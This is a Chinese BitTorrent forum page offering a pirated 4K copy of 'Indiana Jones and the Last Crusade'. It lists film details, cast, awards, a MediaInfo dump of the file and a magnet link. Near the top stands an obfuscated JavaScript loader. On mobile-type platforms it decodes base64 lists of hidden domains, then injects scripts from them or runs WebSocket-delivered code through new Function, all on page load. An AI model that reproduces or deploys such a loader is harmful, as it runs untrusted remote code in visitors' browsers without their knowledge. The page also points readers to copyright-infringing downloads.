夺宝奇兵3[国英语音轨/中文字幕].Indiana.Jones.and.the.Last.Crusade.1989.2160p.4K迅雷下载 16.91GB

版主小s 1月前 192

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x49\x6e\x58\x62\x4c\x54\x4c\x79\x4d\x72']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('uawei')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9veXdoeWVlaGdoYS5ndWlydWktY2xvdGhlcy5jbb20saHR0cHM6Ly9vYnk2aTg3NjZqZjEuYnVqaWFuZ2ppdTEyMy5jbb20saHR0cHM6Ly9vNzdkMjM0a2RrZmhoLnNwYXJreWluY2h1bbi5jbb20saHR0cHM6Ly9vZmhnODg3MmozODRqZGpmLnRoLW1ha2UuY29tLGh0dHBzOi8vbbzM5ZmoyM2pqZDIzOGUueGlqaS1leHByZXNzLmNvbbQ==','d3NNzOi8vd3NN5ZC53c3RlbnNN5cy5jb206OTg2NNix3c3M6Ly93c2R4LndzdGVuc3JzLmNNvbTo5ODY2LHdzczovL3dzbXIud3NN0ZW5zZGYuY29tOjk4NNjY=',window,document,['b','N']);}:function(){};

◎译 名 夺宝奇兵3 / 印地安纳?琼斯和最后的十字军 / 夺宝奇兵3:圣战奇兵 / 圣战奇兵 / 印地安纳?琼斯之圣战奇兵

◎片 名 Indiana Jones and the Last Crusade

◎年 代 1989

◎产 地 美国 / 英国

◎类 别 剧情 / 动作 / 奇幻 / 冒险

◎语 言 英语 / 德语 / 希腊语 / 阿拉伯语

◎上映日期 1989-05-24(美国)

◎IMDb链接 https://www.imdb.com/title/tt0097576/

◎豆瓣评分 8.2/10 (57672人评价)

◎豆瓣链接 https://movie.douban.com/subject/1293471/

◎片 长 127分钟

◎导 演 史蒂文·斯皮尔伯格 Steven Spielberg (id:1054440)

◎编 剧 杰弗里·鲍姆 Jeffrey Boam (id:1037139)

乔治·卢卡斯 George Lucas (id:1054507)

门诺·迈依杰斯 Menno Meyjes (id:1291952)

菲利普·考夫曼 Philip Kaufman (id:1027416)

◎演 员 哈里森·福特 Harrison Ford (id:1009238)

肖恩·康纳利 Sean Connery (id:1018982)

丹霍姆·艾略特 Denholm Elliott (id:1019108)

瑞凡·菲尼克斯 River Phoenix (id:1048001)

约翰·瑞斯-戴维斯 John Rhys-Davies (id:1147054)

艾莉森·杜迪 Alison Doody (id:1040627)

弗农·多布切夫 Vernon Dobtcheff (id:1022603)

帕特·罗奇 Pat Roach (id:1045132)

迈克尔·谢尔德 Michael Sheard (id:1019233)

罗纳德·莱西 Ronald Lacey (id:1111486)

伊斯拉·布莱尔 Isla Blair (id:1061540)

阿列克谢·赛尔 Alexei Sayle (id:1023092)

妮娜·阿姆斯特朗 Nina Armstrong (id:1277065)

Nick Gillard Nick Gillard (id:1276467)

尤金·里皮斯基 Eugene Lipinski (id:1041403)

朱利安·格洛弗 Julian Glover (id:1002790)

迈克尔·伯恩 Michael Byrne (id:1077558)

布拉德利·格雷格 Bradley Gregg (id:1040753)

乔治·卢卡斯 George Lucas (id:1054507)

罗伯特·沃茨 Robert Watts (id:1300525)

约翰·威廉姆斯 John Williams (id:1054692)

乔治·卢卡斯 George Lucas (id:1054507)

朱迪·泰勒 Judy Taylor (id:1298995)

迈克·芬顿 Mike Fenton (id:1283570)

Valorie Massalas Valorie Massalas (id:1291230)

彼得·霍威特 Peter Howitt (id:1287039)

安东尼·鲍威尔 Anthony Powell (id:1131122)

乔安娜·约翰斯顿 Joanna Johnston (id:1287829)

科林·贾米森 Colin Jamison (id:1287572)

Jane Royle Jane Royle (id:1296256)

彼得·罗勃-金 Peter Robb-King (id:1295741)

尼克·杜德曼 Nick Dudman (id:1282763)

Robert L. Stevenson Robert L. Stevenson (id:1298419)

佐尔坦·埃雷克 Zoltan Elek (id:1283102)

宝琳·黑斯 Pauline Heys (id:1286585)

Eddie Knight Eddie Knight (id:1288756)

Katalin Elek Katalin Elek (id:1283086)

Dennis Maguire Dennis Maguire (id:1290727)

尤萨夫·博克哈里 Yousaf Bokhari (id:1278899)

Wes Takahashi Wes Takahashi (id:1298841)

芭芭拉·布伦南 Barbara Brennan (id:1279246)

斯蒂凡·杜普里斯 Stephan Dupuis (id:1282848)

道格拉斯·斯迈斯 Douglas Smythe (id:1297968)

Pat Sweeney Pat Sweeney (id:1298721)

肯尼斯·史密斯 Kenneth Smith (id:1297900)

史蒂夫·高利 Steve Gawley (id:1284643)

布拉德·库恩 Brad Kuehn (id:1289086)

爱德华·赫希 Edward Hirsh (id:1286690)

保罗·哈特森 Paul Huston (id:1287204)

汤姆·柏提诺 Tom Bertino (id:1278530)

Charles Bailey Charles Bailey (id:1277693)

托马斯·罗塞特 Thomas Rosseter (id:1296146)

约翰·埃利斯 John Ellis (id:1305506)

杰克·莫多万 Jack Mongovan (id:1292344)

布鲁斯·沃尔特斯 Bruce Walters (id:1300370)

迈克尔·J·麦卡利斯特尔 Michael J. McAlister (id:1291408)

马克·萨利文 Mark Sullivan (id:1298630)

上杉佑子 Yusei Uesugi (id:1299710)

托马斯·J·史密斯 Thomas J. Smith (id:1276658)

乔恩·亚历山大 Jon Alexander (id:1276987)

梅利莎·泰勒 Melissa Taylor (id:1299007)

史蒂文·E·安德森 Steven E. Anderson (id:1277228)

◎标 签 冒险 / 美国 / 动作 / 探险 / 经典 / 1989 / 魔幻 / 奇幻

◎简 介

传说用耶稣在最后的晚餐中用到的圣杯喝水,便能长生不老。在一次掘金活动中,记载圣杯的碑石被发现,圣杯存在的可能吸引着大批的疯狂的人展开寻找。印第安纳琼斯博士(HarrisonFord饰)也是他们中的一员,甚至连他的父亲老琼斯(SeanConnery饰)也陷入其中——但他给琼斯留下圣杯的笔记后便不知所踪。

踏上威尼斯的土地,琼斯和事先约好的史奈达博士(AlisonDoody饰)会面,他们在图书馆里凭线索找到圣盾后,却开始遭到莫名的来自十字剑兄弟的追杀。

一番波折后,琼斯终于找到了老琼斯,同时,史奈达的纳粹身份暴露,笔记被抢走。圣杯随时都有可能落入纳粹的手中。

于是,琼斯父子俩开始联袂上演拯救圣杯的精彩大戏!

◎获奖情况 (共4项)

第62届奥斯卡金像奖 (1990)

最佳音效剪辑

└──理查德·姆尼斯 (id:1111157)

└──本·贝尔特 (id:1009535)

最佳音响(提名)

└──加里·萨默斯 (id:1298651)

└──托尼·道 (id:1276332)

└──肖恩·墨菲 (id:1054958)

└──本·贝尔特 (id:1009535)

最佳原创配乐(提名)

└──约翰·威廉姆斯 (id:1054692)

第13届日本电影学院奖 (1990)

最佳外语片(提名)

  1. General

  2. Unique ID : 302067138897667116339800290911541774962 (0xE34003CA0DA8C7349149DF377857CA72)

  3. Complete name : Indiana.Jones.and.the.Last.Crusade.1989.2160p.HDR.UHD.BluRay.TrueHD.7.1.Atmos.2Audio.x265-10bit-HDS.mkv

  4. Format : Matroska

  5. Format version : Version 4

  6. File size : 16.9 GiB

  7. Duration : 2 h 6 min

  8. Overall bit rate mode : Variable

  9. Overall bit rate : 19.1 Mb/s

  10. Movie name : Indiana Jones and the Last Crusade 1989 2160p HDR UHD BluRay TrueHD 7.1 Atmos 2Audio x265-10bit-HDS

  11. Encoded date : UTC 2021-06-18 12:17:29

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. HDR format : SMPTE ST 2086, HDR10 compatible

  20. Codec ID : V_MPEGH/ISO/HEVC

  21. Duration : 2 h 6 min

  22. Bit rate : 13.4 Mb/s

  23. Width : 3 840 pixels

  24. Height : 1 632 pixels

  25. Display aspect ratio : 2.35:1

  26. Frame rate mode : Constant

  27. Frame rate : 23.976 (24000/1001/53354) FPS

  28. Color space : YUV

  29. Chroma subsampling : 4:2:0

  30. Bit depth : 10 bits

  31. Bits/(Pixel*Frame) : 0.089

  32. Stream size : 11.9 GiB (70%)

  33. Title : @HDSky

  34. Writing library : x265 - H.265/HEVC codec

  35. Default : Yes

  36. Forced : No

  37. Color range : Limited

  38. Color primaries : BT.2020

  39. Transfer characteristics : PQ

  40. Matrix coefficients : BT.2020 non-constant

  41. Mastering display color primaries : Display P3

  42. Mastering display luminance : min: 0.0020 cd/m2, max: 1000 cd/m2

  43. Maximum Content Light Level : 739 cd/m2

  44. Maximum Frame-Average Light Level : 331 cd/m2


  45. Audio #1

  46. ID : 2

  47. Format : MLP FBA 16-ch

  48. Format/Info : Meridian Lossless Packing FBA with 16-channel presentation

  49. Commercial name : Dolby TrueHD with Dolby Atmos

  50. Codec ID : A_TRUEHD

  51. Duration : 2 h 6 min

  52. Bit rate mode : Variable

  53. Bit rate : 4 034 kb/s

  54. Maximum bit rate : 5 772 kb/s

  55. Channel(s) : 8 channels

  56. Channel layout : L R C LFE Ls Rs Lb Rb

  57. Sampling rate : 48.0 kHz

  58. Frame rate : 1 200.000 FPS (40 SPF)

  59. Compression mode : Lossless

  60. Stream size : 3.57 GiB (21%)

  61. Title : English

  62. Language : English

  63. Default : Yes

  64. Forced : No

  65. Number of dynamic objects : 11

  66. Bed channel count : 1 channel

  67. Bed channel configuration : LFE


  68. Audio #2

  69. ID : 3

  70. Format : DTS

  71. Format/Info : Digital Theater Systems

  72. Codec ID : A_DTS

  73. Duration : 2 h 6 min

  74. Bit rate mode : Constant

  75. Bit rate : 1 510 kb/s

  76. Channel(s) : 6 channels

  77. Channel layout : C L R Ls Rs LFE

  78. Sampling rate : 48.0 kHz

  79. Frame rate : 93.750 FPS (512 SPF)

  80. Bit depth : 24 bits

  81. Compression mode : Lossy

  82. Stream size : 1.34 GiB (8%)

  83. Title : Mandarin

  84. Language : Chinese

  85. Default : No

  86. Forced : No


  87. Text #1

  88. ID : 4

  89. Format : PGS

  90. Muxing mode : zlib

  91. Codec ID : S_HDMV/PGS

  92. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  93. Duration : 1 h 58 min

  94. Bit rate : 25.3 kb/s

  95. Count of elements : 2388

  96. Stream size : 21.3 MiB (0%)

  97. Title : ENG

  98. Language : English

  99. Default : Yes

  100. Forced : No


  101. Text #2

  102. ID : 5

  103. Format : PGS

  104. Muxing mode : zlib

  105. Codec ID : S_HDMV/PGS

  106. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  107. Duration : 2 h 4 min

  108. Bit rate : 14.7 kb/s

  109. Count of elements : 1776

  110. Stream size : 13.1 MiB (0%)

  111. Title : CHT

  112. Language : Chinese

  113. Default : No

  114. Forced : No


  115. Text #3

  116. ID : 6

  117. Format : PGS

  118. Muxing mode : zlib

  119. Codec ID : S_HDMV/PGS

  120. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  121. Duration : 2 h 6 min

  122. Bit rate : 18.8 kb/s

  123. Count of elements : 1730

  124. Stream size : 16.9 MiB (0%)

  125. Title : CHT

  126. Language : Chinese

  127. Default : No

  128. Forced : No


  129. Text #4

  130. ID : 7

  131. Format : PGS

  132. Muxing mode : zlib

  133. Codec ID : S_HDMV/PGS

  134. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  135. Duration : 2 h 5 min

  136. Bit rate : 20.4 kb/s

  137. Count of elements : 2180

  138. Stream size : 18.4 MiB (0%)

  139. Title : CHS

  140. Language : Chinese

  141. Default : No

  142. Forced : No


  143. Text #5

  144. ID : 8

  145. Format : PGS

  146. Muxing mode : zlib

  147. Codec ID : S_HDMV/PGS

  148. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  149. Duration : 1 h 59 min

  150. Bit rate : 22.5 kb/s

  151. Count of elements : 1756

  152. Stream size : 19.3 MiB (0%)

  153. Title : CHS

  154. Language : Chinese

  155. Default : No

  156. Forced : No


  157. Text #6

  158. ID : 9

  159. Format : PGS

  160. Muxing mode : zlib

  161. Codec ID : S_HDMV/PGS

  162. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  163. Duration : 1 h 59 min

  164. Bit rate : 23.0 kb/s

  165. Count of elements : 1756

  166. Stream size : 19.6 MiB (0%)

  167. Title : CHT

  168. Language : Chinese

  169. Default : No

  170. Forced : No


  171. Text #7

  172. ID : 10

  173. Format : PGS

  174. Muxing mode : zlib

  175. Codec ID : S_HDMV/PGS

  176. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  177. Duration : 1 h 59 min

  178. Bit rate : 35.3 kb/s

  179. Count of elements : 1756

  180. Stream size : 30.1 MiB (0%)

  181. Title : CHS&ENG

  182. Language : Chinese

  183. Default : No

  184. Forced : No


  185. Text #8

  186. ID : 11

  187. Format : PGS

  188. Muxing mode : zlib

  189. Codec ID : S_HDMV/PGS

  190. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  191. Duration : 1 h 59 min

  192. Bit rate : 35.7 kb/s

  193. Count of elements : 1756

  194. Stream size : 30.5 MiB (0%)

  195. Title : CHT&ENG

  196. Language : Chinese

  197. Default : No

  198. Forced : No


  199. Menu

  200. 00:00:00.000 : en:Chapter 01

  201. 00:04:41.906 : en:Chapter 02

  202. 00:08:11.031 : en:Chapter 03

  203. 00:11:49.040 : en:Chapter 04

  204. 00:14:14.436 : en:Chapter 05

  205. 00:17:19.413 : en:Chapter 06

  206. 00:22:14.583 : en:Chapter 07

  207. 00:24:51.448 : en:Chapter 08

  208. 00:26:52.152 : en:Chapter 09

  209. 00:30:15.563 : en:Chapter 10

  210. 00:36:31.563 : en:Chapter 11

  211. 00:41:10.425 : en:Chapter 12

  212. 00:44:41.387 : en:Chapter 13

  213. 00:47:42.400 : en:Chapter 14

  214. 00:50:23.728 : en:Chapter 15

  215. 00:54:47.617 : en:Chapter 16

  216. 00:56:31.137 : en:Chapter 17

  217. 01:00:16.153 : en:Chapter 18

  218. 01:03:08.742 : en:Chapter 19

  219. 01:05:31.385 : en:Chapter 20

  220. 01:07:47.313 : en:Chapter 21

  221. 01:10:43.529 : en:Chapter 22

  222. 01:13:36.328 : en:Chapter 23

  223. 01:16:11.358 : en:Chapter 24

  224. 01:18:57.149 : en:Chapter 25

  225. 01:21:20.082 : en:Chapter 26

  226. 01:23:28.461 : en:Chapter 27

  227. 01:25:16.778 : en:Chapter 28

  228. 01:26:58.087 : en:Chapter 29

  229. 01:31:21.975 : en:Chapter 30

  230. 01:36:57.101 : en:Chapter 31

  231. 01:38:53.469 : en:Chapter 32

  232. 01:41:32.586 : en:Chapter 33

  233. 01:49:18.301 : en:Chapter 34

  234. 01:56:05.707 : en:Chapter 35

  235. 02:00:05.948 : en:Chapter 36


TAGS 动作 奇幻 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:A638782553F7FF08EF79EE7AFEFE808469B3726C
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回